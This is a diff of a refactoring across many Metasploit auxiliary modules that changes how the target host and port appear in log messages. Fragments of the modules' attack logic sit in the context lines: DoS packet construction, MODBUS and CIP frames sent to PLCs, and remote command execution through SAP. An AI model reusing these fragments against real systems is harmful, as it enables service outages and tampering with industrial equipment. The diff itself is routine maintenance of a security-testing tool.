+++ b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
     if session
       set_mssql_session(session.client)
     else
-      print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
+      print_status("Attempting to connect to the database server at #{Rex::Socket.to_authority(rhost, rport)} as #{datastore['USERNAME']}...")
       if mssql_login_datastore
         print_good('Connected.')
       else

--- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb
+++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Auxiliary
     if session
       set_mssql_session(session.client)
     else
-      print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
+      print_status("Attempting to connect to the database server at #{Rex::Socket.to_authority(rhost, rport)} as #{datastore['USERNAME']}...")
       if mssql_login_datastore
         print_good('Connected.')
       else

--- a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb
+++ b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb
@@ -352,7 +352,7 @@ class MetasploitModule < Msf::Auxiliary
         set_mssql_session(session.client)
       else
         print_line(' ')
-        print_status("Attempting to connect to the SQL Server at #{rhost}:#{rport}...")
+        print_status("Attempting to connect to the SQL Server at #{Rex::Socket.to_authority(rhost, rport)}...")
         return unless mssql_login_datastore
 
         print_good("Successfully connected to #{mssql_client.peerhost}:#{mssql_client.peerport}")
@@ -363,7 +363,7 @@ class MetasploitModule < Msf::Auxiliary
 
       column_data = result[:rows]
     rescue StandardError
-      print_error("Failed to connect to #{rhost}:#{rport}")
+      print_error("Failed to connect to #{Rex::Socket.to_authority(rhost, rport)}")
       return
     end
 

--- a/modules/auxiliary/admin/networking/cisco_secure_acs_bypass.rb
+++ b/modules/auxiliary/admin/networking/cisco_secure_acs_bypass.rb
@@ -86,12 +86,12 @@ class MetasploitModule < Msf::Auxiliary
           }
       }, 60)
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} [ACS] Unable to communicate")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [ACS] Unable to communicate")
       return :abort
     end
 
     if !res
-      print_error("#{rhost}:#{rport} [ACS] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [ACS] Unable to connect")
       return
     elsif res.code == 200
       body = res.body

--- a/modules/auxiliary/admin/oracle/sid_brute.rb
+++ b/modules/auxiliary/admin/oracle/sid_brute.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Auxiliary
         },
         update: :unique_data
       )
-      print_good("#{rhost}:#{rport} Found SID '#{sid.strip}'")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} Found SID '#{sid.strip}'")
     end
 
     print_status('Done with brute force...')

--- a/modules/auxiliary/admin/oracle/tnscmd.rb
+++ b/modules/auxiliary/admin/oracle/tnscmd.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Auxiliary
 
       pkt = tns_packet(command)
 
-      print_status("Sending '#{command}' to #{rhost}:#{rport}")
+      print_status("Sending '#{command}' to #{Rex::Socket.to_authority(rhost, rport)}")
       sock.put(pkt)
       print_status("writing #{pkt.length} bytes.")
 

--- a/modules/auxiliary/admin/postgres/postgres_readfile.rb
+++ b/modules/auxiliary/admin/postgres/postgres_readfile.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary
     ret = postgres_read_textfile(datastore['RFILE'])
     case ret.keys[0]
     when :conn_error
-      print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} Postgres - Authentication failure, could not connect."
     when :sql_error
       case ret[:sql_error]
       when /^C58P01/

--- a/modules/auxiliary/admin/postgres/postgres_sql.rb
+++ b/modules/auxiliary/admin/postgres/postgres_sql.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Auxiliary
     ret = postgres_query(datastore['SQL'], datastore['RETURN_ROWSET'])
     case ret.keys[0]
     when :conn_error
-      print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} Postgres - Authentication failure, could not connect."
     when :sql_error
       print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{ret[:sql_error]}"
     when :complete

--- a/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb
+++ b/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     begin
-      print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending remote command: " + datastore['CMD'])
       uri = normalize_uri(target_uri.path, 'ConfigServlet')
 
       res = send_request_cgi(
@@ -56,21 +56,21 @@ class MetasploitModule < Msf::Auxiliary
         }
       )
       if !res || (res.code != 200)
-        print_error("#{rhost}:#{rport} - Exploit failed")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - Exploit failed")
         return
       end
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} - Failed to connect to the server")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the server")
       return
     end
 
     if res.body.include?('Process created')
-      print_good("#{rhost}:#{rport} - Exploited successfully\n")
-      print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
-      print_line("#{rhost}:#{rport} - Output: #{res.body}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Exploited successfully\n")
+      print_line("#{Rex::Socket.to_authority(rhost, rport)} - Command: #{datastore['CMD']}\n")
+      print_line("#{Rex::Socket.to_authority(rhost, rport)} - Output: #{res.body}")
     else
-      print_error("#{rhost}:#{rport} - Exploit failed")
-      vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Exploit failed")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Output: #{res.body}")
     end
   end
 end

--- a/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb
+++ b/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb
@@ -78,12 +78,12 @@ class MetasploitModule < Msf::Auxiliary
           }
       }, 60)
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} [SAP] Unable to communicate")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to communicate")
       return :abort
     end
 
     if !res
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     elsif res.code == 200
       body = res.body
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def osexecute(rhost, cmd_to_run)
-    print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
+    print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{Rex::Socket.to_authority(rhost, rport)}")
     success = false
 
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
@@ -161,19 +161,19 @@ class MetasploitModule < Msf::Auxiliary
           fault = true
         end
       else
-        print_error("#{rhost}:#{rport} [SAP] Unknown response received")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unknown response received")
         return
       end
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to attempt authentication")
       return :abort
     end
 
     if success
       if exitcode > 0
-        print_error("#{rhost}:#{rport} [SAP] Command exitcode: #{exitcode}")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Command exitcode: #{exitcode}")
       else
-        print_good("#{rhost}:#{rport} [SAP] Command exitcode: #{exitcode}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Command exitcode: #{exitcode}")
       end
 
       saptbl = Msf::Ui::Console::Table.new(
@@ -187,13 +187,13 @@ class MetasploitModule < Msf::Auxiliary
         saptbl << [ output[0] ]
       end
 
-      print_good("#{rhost}:#{rport} [SAP] Command (#{cmd_to_run}) ran as PID: #{pid}\n#{saptbl}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Command (#{cmd_to_run}) ran as PID: #{pid}\n#{saptbl}")
 
     elsif fault
-      print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Error code: #{faultcode}")
       return
     else
-      print_error("#{rhost}:#{rport} [SAP] failed to run command")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] failed to run command")
       return
     end
   end

--- a/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb
+++ b/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb
@@ -140,6 +140,6 @@ class MetasploitModule < Msf::Auxiliary
       contents,
       file_name
     )
-    print_good("#{rhost}:#{rport} - File saved in: #{path}")
+    print_good("#{Rex::Socket.to_authority(rhost, rport)} - File saved in: #{path}")
   end
 end

--- a/modules/auxiliary/admin/scada/modicon_password_recovery.rb
+++ b/modules/auxiliary/admin/scada/modicon_password_recovery.rb
@@ -207,7 +207,7 @@ class MetasploitModule < Msf::Auxiliary
       proof = 'Usual defaults'
     end
 
-    print_status("#{rhost}:#{rport} - FTP - Storing HTTP credentials")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - FTP - Storing HTTP credentials")
     logins << ['http', httpuser, httppass]
 
     report_cred(
@@ -246,7 +246,7 @@ class MetasploitModule < Msf::Auxiliary
       modicon_ftpuser = 'USER'
       modicon_ftppass = 'USERUSER' # from the manual.  Verified.
     end
-    print_status("#{rhost}:#{rport} - FTP - Storing hashed FTP credentials")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - FTP - Storing hashed FTP credentials")
     # The collected hash is not directly reusable, so it shouldn't be an
     # auth credential in the Cred sense. TheLightCosine should fix some day.
     # Can be used for telnet as well if telnet is enabled.

--- a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb
+++ b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Auxiliary
   # just prepends the payload with a modbus header
   def makeframe(packetdata)
     if packetdata.size > 255
-      print_error("#{rhost}:#{rport} - MODBUS - Packet too large: #{packetdata.inspect}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - MODBUS - Packet too large: #{packetdata.inspect}")
       return
     end
     payload = ''
@@ -197,12 +197,12 @@ class MetasploitModule < Msf::Auxiliary
   # Write the contents of local file filename to the target's filenumber
   # blank logic files will be available on the Digital Bond website
   def writefile
-    print_status "#{rhost}:#{rport} - MODBUS - Sending write request"
+    print_status "#{Rex::Socket.to_authority(rhost, rport)} - MODBUS - Sending write request"
     blocksize = 244	# bytes per block in file transfer
     buf = File.binread(datastore['FILENAME'])
     fullblocks = buf.length / blocksize
     if fullblocks > 255
-      print_error("#{rhost}:#{rport} - MODBUS - File too large, aborting.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - MODBUS - File too large, aborting.")
       return
     end
     lastblocksize = buf.length - (blocksize * fullblocks)
@@ -234,9 +234,9 @@ class MetasploitModule < Msf::Auxiliary
     payload += filenum
     response = sendframe(makeframe(payload))
     if response[8..9] == "\x01\xfe"
-      print_status("#{rhost}:#{rport} - MODBUS - Write request success!  Writing file...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - MODBUS - Write request success!  Writing file...")
     else
-      print_error("#{rhost}:#{rport} - MODBUS - Write request error.  Aborting.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - MODBUS - Write request error.  Aborting.")
       return
     end
     payload = "\x00\x5a\x01\x04"
@@ -250,14 +250,14 @@ class MetasploitModule < Msf::Auxiliary
       payload += "\x00\xf4\x00"
       payload += buf[((block - 1) * 244)..((block * 244) - 1)]
       res = sendframe(makeframe(payload))
-      vprint_status "#{rhost}:#{rport} - MODBUS - Block #{block}: #{payload.inspect}"
+      vprint_status "#{Rex::Socket.to_authority(rhost, rport)} - MODBUS - Block #{block}: #{payload.inspect}"
       if res[8..9] != "\x01\xfe"
-        print_error("#{rhost}:#{rport} - MODBUS - Failure writing block #{block}")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - MODBUS - Failure writing block #{block}")
         return
       end
       # redo this iteration of the loop if we're on block 2
       if (block2status == 0) && (block == 2)
-        print_status("#{rhost}:#{rport} - MODBUS - Sending block 2 a second time")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} - MODBUS - Sending block 2 a second time")
         block2status = 1
         redo
       end
@@ -269,25 +269,25 @@ class MetasploitModule < Msf::Auxiliary
       payload += [block].pack('c')
       payload += "\x00" + [lastblocksize].pack('c') + "\x00"
       payload += buf[((block - 1) * 244)..(((block - 1) * 244) + lastblocksize)]
-      vprint_status "#{rhost}:#{rport} - MODBUS - Block #{block}: #{payload.inspect}"
+      vprint_status "#{Rex::Socket.to_authority(rhost, rport)} - MODBUS - Block #{block}: #{payload.inspect}"
       res = sendframe(makeframe(payload))
       if res[8..9] != "\x01\xfe"
-        print_error("#{rhost}:#{rport} - MODBUS - Failure writing last block")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - MODBUS - Failure writing last block")
         return
       end
     end
-    vprint_status "#{rhost}:#{rport} - MODBUS - Closing file"
+    vprint_status "#{Rex::Socket.to_authority(rhost, rport)} - MODBUS - Closing file"
     payload = "\x00\x5a\x01\x32\x00\x01" + [fileblocks].pack('c') + "\x00"
     sendframe(makeframe(payload))
   end
 
   # Only reading the STL file is supported at the moment :(
   def readfile
-    print_status "#{rhost}:#{rport} - MODBUS - Sending read request"
+    print_status "#{Rex::Socket.to_authority(rhost, rport)} - MODBUS - Sending read request"
     file = File.open(datastore['FILENAME'], 'wb')
     payload = "\x00\x5a\x01\x33\x00\x01\xfb\x00"
     sendframe(makeframe(payload))
-    print_status("#{rhost}:#{rport} - MODBUS - Retrieving file")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - MODBUS - Retrieving file")
     block = 1
     filedata = ''
     finished = false
@@ -297,14 +297,14 @@ class MetasploitModule < Msf::Auxiliary
       payload += "\x00"
       response = sendframe(makeframe(payload))
       filedata += response[0xe..]
-      vprint_status "#{rhost}:#{rport} - MODBUS - Block #{block}: #{response[0xe..].inspect}"
+      vprint_status "#{Rex::Socket.to_authority(rhost, rport)} - MODBUS - Block #{block}: #{response[0xe..].inspect}"
       if response[0xa] == "\x01" # apparently 0x00 == more data, 0x01 == eof?
         finished = true
       else
         block += 1
       end
     end
-    print_status("#{rhost}:#{rport} - MODBUS - Closing file")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - MODBUS - Closing file")
     payload = "\x00\x5a\x01\x35\x00\x01" + [block].pack('c') + "\x00"
     sendframe(makeframe(payload))
     file.print filedata

--- a/modules/auxiliary/admin/scada/multi_cip_command.rb
+++ b/modules/auxiliary/admin/scada/multi_cip_command.rb
@@ -58,11 +58,11 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     attack = datastore['ATTACK']
-    print_status "#{rhost}:#{rport} - CIP - Running #{attack} attack."
+    print_status "#{Rex::Socket.to_authority(rhost, rport)} - CIP - Running #{attack} attack."
     sid = req_session
     if sid
       forge_packet(sid, payload(attack))
-      print_status "#{rhost}:#{rport} - CIP - #{attack} attack complete."
+      print_status "#{Rex::Socket.to_authority(rhost, rport)} - CIP - #{attack} attack complete."
     end
   end
 
@@ -75,10 +75,10 @@ class MetasploitModule < Msf::Auxiliary
     begin
       sock.put(packet)
     rescue ::Interrupt
-      print_error("#{rhost}:#{rport} - CIP - Interrupt during payload")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - CIP - Interrupt during payload")
       raise $ERROR_INFO
     rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
-      print_error("#{rhost}:#{rport} - CIP - Network error during payload")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - CIP - Network error during payload")
       return nil
     end
   end
@@ -104,19 +104,19 @@ class MetasploitModule < Msf::Auxiliary
           nil
         end
         if session_id
-          print_status("#{rhost}:#{rport} - CIP - Got session id: 0x" + session_id.to_s(16))
+          print_status("#{Rex::Socket.to_authority(rhost, rport)} - CIP - Got session id: 0x" + session_id.to_s(16))
         else
-          print_error("#{rhost}:#{rport} - CIP - Got invalid session id, aborting.")
+          print_error("#{Rex::Socket.to_authority(rhost, rport)} - CIP - Got invalid session id, aborting.")
           return nil
         end
       else
         raise ::Rex::ConnectionTimeout
       end
     rescue ::Interrupt
-      print_error("#{rhost}:#{rport} - CIP - Interrupt during session negotiation")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - CIP - Interrupt during session negotiation")
       raise $ERROR_INFO
     rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused => e
-      print_error("#{rhost}:#{rport} - CIP - Network error during session negotiation: #{e}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - CIP - Network error during session negotiation: #{e}")
       return nil
     end
     return session_id
@@ -146,7 +146,7 @@ class MetasploitModule < Msf::Auxiliary
       "\x00\x00\x00\x00\x00\x04\x02\x00\x00\x00\x00\x00\xb2\x00\x08\x00" \
         "\x05\x03\x20\x01\x24\x01\x30\x03"
     else
-      print_error("#{rhost}:#{rport} - CIP - Invalid attack option.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - CIP - Invalid attack option.")
       return nil
     end
   end

--- a/modules/auxiliary/admin/tftp/tftp_transfer_util.rb
+++ b/modules/auxiliary/admin/tftp/tftp_transfer_util.rb
@@ -183,12 +183,12 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_upload
-    print_status "Sending '#{file}' to #{rhost}:#{rport} as '#{remote_file}'"
+    print_status "Sending '#{file}' to #{Rex::Socket.to_authority(rhost, rport)} as '#{remote_file}'"
     @tftp_client.send_write_request { |msg| print_tftp_status(msg) }
   end
 
   def run_download
-    print_status "Receiving '#{remote_file}' from #{rhost}:#{rport} as '#{file}'"
+    print_status "Receiving '#{remote_file}' from #{Rex::Socket.to_authority(rhost, rport)} as '#{file}'"
     @tftp_client.send_read_request { |msg| print_tftp_status(msg) }
   end
 

--- a/modules/auxiliary/dos/cisco/ios_telnet_rocem.rb
+++ b/modules/auxiliary/dos/cisco/ios_telnet_rocem.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Auxiliary
     sock.put("\xff\xfa\x24\x00\x03CISCO_KITS\x012:" + Rex::Text.rand_text_alpha(1000) + ":1:\xff\xf0")
     disconnect
   rescue ::Rex::ConnectionRefused
-    print_status "Unable to connect to #{rhost}:#{rport}."
+    print_status "Unable to connect to #{Rex::Socket.to_authority(rhost, rport)}."
   rescue ::Errno::ECONNRESET
     print_good "DoS packet successful. #{rhost} not responding."
   end

--- a/modules/auxiliary/dos/http/3com_superstack_switch.rb
+++ b/modules/auxiliary/dos/http/3com_superstack_switch.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     connect
-    print_status("Sending DoS packet to #{rhost}:#{rport}")
+    print_status("Sending DoS packet to #{Rex::Socket.to_authority(rhost, rport)}")
 
     sploit = "GET / HTTP/1.0\r\n"
     sploit << 'Referer: ' + Rex::Text.rand_text_alpha(1) * 128000
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary
     disconnect
     print_error('DoS packet unsuccessful')
   rescue ::Rex::ConnectionRefused
-    print_error("Unable to connect to #{rhost}:#{rport}")
+    print_error("Unable to connect to #{Rex::Socket.to_authority(rhost, rport)}")
   rescue ::Errno::ECONNRESET
     print_good("DoS packet successful. #{rhost} not responding.")
   end

--- a/modules/auxiliary/dos/http/apache_range_dos.rb
+++ b/modules/auxiliary/dos/http/apache_range_dos.rb
@@ -108,7 +108,7 @@ class MetasploitModule < Msf::Auxiliary
 
     for x in 1..datastore['RLIMIT']
       begin
-        print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
+        print_status("Sending DoS packet #{x} to #{Rex::Socket.to_authority(rhost, rport)}")
         _res = send_request_cgi(
           {
             'uri' => uri,
@@ -122,11 +122,11 @@ class MetasploitModule < Msf::Auxiliary
           1
         )
       rescue ::Rex::ConnectionRefused
-        print_error("Unable to connect to #{rhost}:#{rport}")
+        print_error("Unable to connect to #{Rex::Socket.to_authority(rhost, rport)}")
       rescue ::Errno::ECONNRESET
         print_good("DoS packet successful. #{rhost} not responding.")
       rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-        print_error("Couldn't connect to #{rhost}:#{rport}")
+        print_error("Couldn't connect to #{Rex::Socket.to_authority(rhost, rport)}")
       rescue ::Timeout::Error, ::Errno::EPIPE => e
         vprint_error(e.message)
       end

--- a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb
+++ b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Auxiliary
     for x in 1..datastore['RLIMIT']
       begin
         connect
-        print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
+        print_status("Sending DoS packet #{x} to #{Rex::Socket.to_authority(rhost, rport)}")
 
         sploit = "POST / HTTP/1.1\r\n"
         sploit << 'Host: ' + rhost + "\r\n"
@@ -63,11 +63,11 @@ class MetasploitModule < Msf::Auxiliary
 
         print_error('DoS packet unsuccessful')
       rescue ::Rex::ConnectionRefused
-        print_error("Unable to connect to #{rhost}:#{rport}")
+        print_error("Unable to connect to #{Rex::Socket.to_authority(rhost, rport)}")
       rescue ::Errno::ECONNRESET
         print_good("DoS packet successful. #{rhost} not responding.")
       rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-        print_error("Couldn't connect to #{rhost}:#{rport}")
+        print_error("Couldn't connect to #{Rex::Socket.to_authority(rhost, rport)}")
       rescue ::Timeout::Error, ::Errno::EPIPE => e
         vprint_error(e.message)
       end

--- a/modules/auxiliary/dos/http/canon_wireless_printer.rb
+++ b/modules/auxiliary/dos/http/canon_wireless_printer.rb
@@ -73,7 +73,7 @@ class MetasploitModule < Msf::Auxiliary
           '&LAN_HID1=1'
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
-      print_error("Couldn't connect to #{rhost}:#{rport}")
+      print_error("Couldn't connect to #{Rex::Socket.to_authority(rhost, rport)}")
       return
     end
 
@@ -85,9 +85,9 @@ class MetasploitModule < Msf::Auxiliary
 
     # Check to see if it worked or not
     if is_alive?
-      print_error("#{rhost}:#{rport} - Server is still alive")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Server is still alive")
     else
-      print_good("#{rhost}:#{rport} - Connection Refused: Success!")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Connection Refused: Success!")
     end
   end
 end

--- a/modules/auxiliary/dos/http/hashcollision_dos.rb
+++ b/modules/auxiliary/dos/http/hashcollision_dos.rb
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Auxiliary
     post = ''
     max_value_float = size**length
     max_value_int = max_value_float.floor
-    print_status("#{rhost}:#{rport} - Generating POST data...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Generating POST data...")
     for i in 0.upto(max_value_int)
       input_string = i.to_s(size)
       result = input_string.rjust(length, '0')
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def compute_collision_chars
-    print_status("#{rhost}:#{rport} - Trying to find hashes...") if @recursive_counter == 1
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to find hashes...") if @recursive_counter == 1
     hashes = {}
     counter = 0
     length = datastore['CollisionCharLength']
@@ -133,18 +133,18 @@ class MetasploitModule < Msf::Auxiliary
     if counter < datastore['CollisionChars']
       # Try it again
       if @recursive_counter > datastore['RecursiveMax']
-        print_error("#{rhost}:#{rport} - Not enough values found. Please start this script again.")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - Not enough values found. Please start this script again.")
         return nil
       end
-      print_status("#{rhost}:#{rport} - #{@recursive_counter}: Not enough values found. Trying again...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - #{@recursive_counter}: Not enough values found. Trying again...")
       @recursive_counter += 1
       hashes = compute_collision_chars
     else
-      print_status("#{rhost}:#{rport} - Found values:")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Found values:")
       hashes.each_value do |item|
-        print_status("#{rhost}:#{rport} -\tValue: #{item}\tHash: #{@function.call(item)}")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} -\tValue: #{item}\tHash: #{@function.call(item)}")
         item.each_char do |c|
-          print_status("#{rhost}:#{rport} -\t\tValue: #{c}\tCharcode: #{c.unpack('C')}")
+          print_status("#{Rex::Socket.to_authority(rhost, rport)} -\t\tValue: #{c}\tCharcode: #{c.unpack('C')}")
         end
       end
     end
@@ -190,7 +190,7 @@ class MetasploitModule < Msf::Auxiliary
       raise "Target #{datastore['TARGET']} not supported"
     end
 
-    print_status("#{rhost}:#{rport} - Generating payload...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Generating payload...")
     payload = generate_payload
     return if payload.nil?
 
@@ -200,10 +200,10 @@ class MetasploitModule < Msf::Auxiliary
     # remove last invalid(cut off) parameter
     position = payload.rindex('=&')
     payload = payload[0, position + 1]
-    print_status("#{rhost}:#{rport} -Payload generated")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} -Payload generated")
 
     for x in 1..datastore['RLIMIT']
-      print_status("#{rhost}:#{rport} - Sending request ##{x}...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending request ##{x}...")
       opts = {
         'method'	=> 'POST',
         'uri'	=> normalize_uri(datastore['URL']),
@@ -215,7 +215,7 @@ class MetasploitModule < Msf::Auxiliary
         c.send_request(r)
         # Don't wait for a response, can take hours
       rescue ::Rex::ConnectionError => e
-        print_error("#{rhost}:#{rport} - Unable to connect: '#{e.message}'")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - Unable to connect: '#{e.message}'")
         return
       ensure
         disconnect(c) if c

--- a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
+++ b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
@@ -131,7 +131,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    print_status("#{rhost}:#{rport} - Sending DoS packet...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending DoS packet...")
     dos
   end
 

--- a/modules/auxiliary/dos/http/monkey_headers.rb
+++ b/modules/auxiliary/dos/http/monkey_headers.rb
@@ -64,16 +64,16 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    print_status("#{rhost}:#{rport} - Sending DoS packet...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending DoS packet...")
     dos
 
-    print_status("#{rhost}:#{rport} - Checking server status...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Checking server status...")
     select(nil, nil, nil, 1)
 
     if is_alive?
-      print_error("#{rhost}:#{rport} - Server is still alive")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Server is still alive")
     else
-      print_good("#{rhost}:#{rport} - Connection Refused: Success!")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Connection Refused: Success!")
     end
   end
 end

--- a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb
+++ b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb
@@ -61,9 +61,9 @@ class MetasploitModule < Msf::Auxiliary
         print_status("Information leaked: #{::Regexp.last_match(1)}")
       end
 
-      print_status("Request sent to #{rhost}:#{rport}")
+      print_status("Request sent to #{Rex::Socket.to_authority(rhost, rport)}")
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_status("Couldn't connect to #{rhost}:#{rport}")
+      print_status("Couldn't connect to #{Rex::Socket.to_authority(rhost, rport)}")
     rescue ::Timeout::Error, ::Errno::EPIPE => e
       vprint_error(e.message)
     end

--- a/modules/auxiliary/dos/http/squid_range_dos.rb
+++ b/modules/auxiliary/dos/http/squid_range_dos.rb
@@ -78,9 +78,9 @@ class MetasploitModule < Msf::Auxiliary
 
       if res && (res.code == 200) && (count == 0)
         count = 1
-        print_status("Sent first request to #{rhost}:#{rport}")
+        print_status("Sent first request to #{Rex::Socket.to_authority(rhost, rport)}")
       elsif res
-        print_status("Sent DoS request #{count} to #{rhost}:#{rport}")
+        print_status("Sent DoS request #{count} to #{Rex::Socket.to_authority(rhost, rport)}")
         count += 1
         error_count = 0
 

--- a/modules/auxiliary/dos/http/webrick_regex.rb
+++ b/modules/auxiliary/dos/http/webrick_regex.rb
@@ -51,9 +51,9 @@ class MetasploitModule < Msf::Auxiliary
     c = connect(o)
     c.send_request(c.request_raw(o))
 
-    print_status("Request sent to #{rhost}:#{rport}")
+    print_status("Request sent to #{Rex::Socket.to_authority(rhost, rport)}")
   rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-    print_status("Couldn't connect to #{rhost}:#{rport}")
+    print_status("Couldn't connect to #{Rex::Socket.to_authority(rhost, rport)}")
   rescue ::Timeout::Error, ::Errno::EPIPE => e
     vprint_error(e.message)
   end

--- a/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb
+++ b/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     if wordpress_and_online?
-      print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress")
